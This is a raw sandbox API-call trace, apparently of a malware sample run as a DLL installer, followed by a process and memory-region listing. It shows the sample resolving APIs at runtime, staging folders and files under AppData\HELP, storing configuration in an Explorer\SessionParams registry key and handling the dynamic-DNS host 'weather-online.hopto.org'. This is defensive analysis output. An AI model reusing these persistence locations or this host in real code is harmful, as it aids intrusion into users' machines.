[0032.834] SetLastError (dwErrCode=0x0) [0032.834] GetLastError () returned 0x0 [0032.834] SetLastError (dwErrCode=0x0) [0032.835] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.835] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.835] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.836] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af7d0 | out: lpSystemTimeAsFileTime=0x1af7d0*(dwLowDateTime=0xe14a5af0, dwHighDateTime=0x1d3dfba)) [0032.836] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af708, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.836] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af5f0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.836] GetLastError () returned 0x0 [0032.837] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.837] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.837] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.837] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.837] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.837] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.837] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.837] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.837] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.837] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.837] GetLastError () returned 0xb7 [0032.837] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.837] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.837] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.837] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.838] wsprintfA (in: param_1=0x1af470, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.838] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.838] wsprintfA (in: param_1=0x1af36c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.838] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.838] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.838] CloseHandle (hObject=0x74) returned 1 [0032.838] GetLastError () returned 0x0 [0032.838] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.838] GetLastError () returned 0x0 [0032.838] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.838] GetSystemDirectoryA (in: lpBuffer=0x1af470, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.838] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.838] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.838] CloseHandle (hObject=0x74) returned 1 [0032.838] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.839] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.839] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.840] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.840] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.840] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.840] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.840] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.840] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.840] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.840] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.841] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.842] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.842] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.842] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.842] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.842] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.842] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.842] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.842] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.842] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0032.842] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.842] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.842] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.842] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.842] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.842] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.842] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.842] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.842] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.843] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.843] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.843] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.843] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.843] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.843] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.843] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.843] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.843] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.843] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.843] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.843] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.843] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.843] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.843] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.843] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.843] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.843] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.843] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.843] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0032.844] AddAtomT () returned 0x0 [0032.844] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1af9a4, lpdwDisposition=0x1af9a8 | out: phkResult=0x1af9a4*=0x78, lpdwDisposition=0x1af9a8*=0x2) returned 0x0 [0032.844] CloseHandle (hObject=0x78) returned 1 [0032.844] SendMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0032.844] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1af9f0, lpdwDisposition=0x1afaa8 | out: phkResult=0x1af9f0*=0x7c, lpdwDisposition=0x1afaa8*=0x2) returned 0x0 [0032.844] RegQueryValueExA (in: hKey=0x7c, lpValueName="Timout", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1ed94, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x0, lpData=0x72f1ed94*=0x0, lpcbData=0x1af9ec*=0x4) returned 0x2 [0032.844] RegQueryValueExA (in: hKey=0x7c, lpValueName="IsActive", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1ed98, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x0, lpData=0x72f1ed98*=0x0, lpcbData=0x1af9ec*=0x4) returned 0x2 [0032.844] RegQueryValueExA (in: hKey=0x7c, lpValueName="BSlp", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1ed9c, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x0, lpData=0x72f1ed9c*=0x0, lpcbData=0x1af9ec*=0x4) returned 0x2 [0032.844] RegQueryValueExA (in: hKey=0x7c, lpValueName="SDCnt", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1eda4, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x0, lpData=0x72f1eda4*=0x0, lpcbData=0x1af9ec*=0x4) returned 0x2 [0032.844] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastValue", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1eda8, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x0, lpData=0x72f1eda8*=0x0, lpcbData=0x1af9ec*=0x4) returned 0x2 [0032.844] RegQueryValueExA (in: hKey=0x7c, lpValueName="Id", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1edb8, lpcbData=0x1af9ec*=0x8 | out: lpType=0x1af9f4*=0x3, lpData=0x72f1edb8*, lpcbData=0x1af9ec*=0x8) returned 0x0 [0032.844] RegQueryValueExA (in: hKey=0x7c, lpValueName="StVal", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1edc0, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x4, lpData=0x72f1edc0*=0x1, lpcbData=0x1af9ec*=0x4) returned 0x0 [0032.844] RegQueryValueExA (in: hKey=0x7c, lpValueName="EmtParam", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1edc4, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x0, lpData=0x72f1edc4*=0x0, lpcbData=0x1af9ec*=0x4) returned 0x2 [0032.845] RegQueryValueExA (in: hKey=0x7c, lpValueName="HtParam", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1edc8, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x4, lpData=0x72f1edc8*=0xe10, lpcbData=0x1af9ec*=0x4) returned 0x0 [0032.845] RegQueryValueExA (in: hKey=0x7c, lpValueName="CMValue", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1edcc, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x4, lpData=0x72f1edcc*=0x0, lpcbData=0x1af9ec*=0x4) returned 0x0 [0032.845] RegQueryValueExA (in: hKey=0x7c, lpValueName="ILevelCount", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1edd0, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x4, lpData=0x72f1edd0*=0x1, lpcbData=0x1af9ec*=0x4) returned 0x0 [0032.845] RegQueryValueExA (in: hKey=0x7c, lpValueName="IListLen", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1eddc, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x0, lpData=0x72f1eddc*=0x0, lpcbData=0x1af9ec*=0x4) returned 0x2 [0032.845] RegQueryValueExA (in: hKey=0x7c, lpValueName="IList", lpReserved=0x0, lpType=0x1af9f4, lpData=0x12c0b28, lpcbData=0x1af9ec*=0x200 | out: lpType=0x1af9f4*=0x0, lpData=0x12c0b28*=0x0, lpcbData=0x1af9ec*=0x200) returned 0x2 [0032.845] RegQueryValueExA (in: hKey=0x7c, lpValueName="Installed", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1eef0, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x0, lpData=0x72f1eef0*=0x1, lpcbData=0x1af9ec*=0x4) returned 0x2 [0032.845] RegQueryValueExA (in: hKey=0x7c, lpValueName="IPlace", lpReserved=0x0, lpType=0x1af9f4, lpData=0x12c0d30, lpcbData=0x1af9ec*=0x64 | out: lpType=0x1af9f4*=0x3, lpData=0x12c0d30*, lpcbData=0x1af9ec*=0x2) returned 0x0 [0032.845] lstrlenA (lpString=" ") returned 1 [0032.845] RegQueryValueExA (in: hKey=0x7c, lpValueName="ISFValue", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1edec, lpcbData=0x1af9ec*=0x104 | out: lpType=0x1af9f4*=0x3, lpData=0x72f1edec*, lpcbData=0x1af9ec*=0x0) returned 0x0 [0032.845] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastId", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1eef4, lpcbData=0x1af9ec*=0x8 | out: lpType=0x1af9f4*=0x0, lpData=0x72f1eef4*=0x0, lpcbData=0x1af9ec*=0x8) returned 0x2 [0032.845] RegQueryValueExA (in: hKey=0x7c, lpValueName="NTries", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1eefc, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x0, lpData=0x72f1eefc*=0x0, lpcbData=0x1af9ec*=0x4) returned 0x2 [0032.845] RegQueryValueExA (in: hKey=0x7c, lpValueName="IMValue", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1ef00, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x0, lpData=0x72f1ef00*=0x0, lpcbData=0x1af9ec*=0x4) returned 0x2 [0032.845] RegQueryValueExA (in: hKey=0x7c, lpValueName="LCValue", lpReserved=0x0, lpType=0x1af9f4, lpData=0x72f1eda0, lpcbData=0x1af9ec*=0x4 | out: lpType=0x1af9f4*=0x0, lpData=0x72f1eda0*=0x0, lpcbData=0x1af9ec*=0x4) returned 0x2 [0032.845] RegCloseKey (hKey=0x7c) returned 0x0 [0032.845] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1afab0 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1afab0*=0x2) returned 0x0 [0032.845] RegSetValueExA (in: hKey=0x7c, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x72f1edc8*=0x1c20, cbData=0x4 | out: lpData=0x72f1edc8*=0x1c20) returned 0x0 [0032.845] GetLastError () returned 0x0 [0032.845] RegCloseKey (hKey=0x7c) returned 0x0 [0032.845] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1afac0 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1afac0*=0x2) returned 0x0 [0032.846] RegSetValueExA (in: hKey=0x7c, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x72f1edc0*=0x0, cbData=0x4 | out: lpData=0x72f1edc0*=0x0) returned 0x0 [0032.846] RegCloseKey (hKey=0x7c) returned 0x0 [0032.846] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1afab0 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1afab0*=0x2) returned 0x0 [0032.846] RegSetValueExA (in: hKey=0x7c, lpValueName="CMValue", Reserved=0x0, dwType=0x4, lpData=0x72f1edcc*=0x0, cbData=0x4 | out: lpData=0x72f1edcc*=0x0) returned 0x0 [0032.846] RegCloseKey (hKey=0x7c) returned 0x0 [0032.846] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1afaac | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1afaac*=0x2) returned 0x0 [0032.846] RegSetValueExA (in: hKey=0x7c, lpValueName="ILevelCount", Reserved=0x0, dwType=0x4, lpData=0x72f1edd0*=0x1, cbData=0x4 | out: lpData=0x72f1edd0*=0x1) returned 0x0 [0032.846] RegCloseKey (hKey=0x7c) returned 0x0 [0032.846] GetLastError () returned 0x0 [0032.846] GetLastError () returned 0x0 [0032.846] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0032.846] lstrlenA (lpString="00") returned 2 [0032.846] lstrlenA (lpString="/00/") returned 4 [0032.846] wsprintfA (in: param_1=0x12c0da0, param_2="%s" | out: param_1="weather-online.hopto.org") returned 24 [0032.846] wsprintfA (in: param_1=0x12c0dc8, param_2="%s" | out: param_1="00") returned 2 [0032.846] wsprintfA (in: param_1=0x12c26e8, param_2="%s" | out: param_1="/00/") returned 4 [0032.846] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0032.846] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0032.846] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1afaac | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1afaac*=0x2) returned 0x0 [0032.847] RegSetValueExA (in: hKey=0x7c, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x12c0d30*, cbData=0x64 | out: lpData=0x12c0d30*) returned 0x0 [0032.847] RegCloseKey (hKey=0x7c) returned 0x0 [0032.848] HeapDestroy (hHeap=0x12c0000) returned 1 Process: id = "28" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f9e0" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"Install\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1311 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1312 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1313 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1314 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1315 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1316 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1317 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1318 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1319 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1320 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1321 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1322 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1323 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1324 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1325 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1326 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1327 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1328 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" 